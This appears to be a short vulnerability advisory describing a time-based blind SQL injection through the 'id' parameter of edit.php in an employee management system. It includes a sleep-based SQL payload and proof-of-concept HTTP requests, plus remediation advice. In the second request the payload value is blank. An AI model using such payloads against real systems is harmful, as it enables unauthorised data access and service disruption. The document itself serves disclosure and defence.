# Vulnerability Summary: SQL Injection Vulnerability in EMPLOYEE_MANAGEMENT_SYSTEM ## Vulnerability Overview * **Vulnerability Type**: SQL Injection (Time-based Blind SQL Injection) * **Affected File**: `370project/edit.php` * **Root Cause**: User-controllable input (the `id` parameter) is directly concatenated into SQL statements without parameterization. ## Impact Scope * Inference or extraction of data using blind injection techniques. * Bypassing expected query logic to access unauthorized records (depending on database privileges). * Reduction of service availability by triggering expensive, time-consuming queries. ## Exploit Code (Payload) ```sql (select*from(select+sleep(10)union/**/select+1)a) ``` ## Proof of Concept (POC) **1. Baseline Request:** ```http GET /edit.php?id=101 HTTP/1.1 Host: 370project:82 Accept: text/html Connection: close ``` **2. Time Delay Verification Request (URL-encoded Payload):** ```http GET /edit.php?id= HTTP/1.1 Host: 370project:82 Accept: text/html Connection: close ``` **Expected Result**: The second request should be approximately 10 seconds slower than the baseline request, indicating that the injected expression was executed on the database side. ## Remediation * **Parameterized Queries**: Use prepared statements or parameterized queries instead of string concatenation. * **Input Validation**: Perform strict type checking and filtering on input parameters. * **Principle of Least Privilege**: Ensure database accounts possess only the minimum privileges required for their intended functions.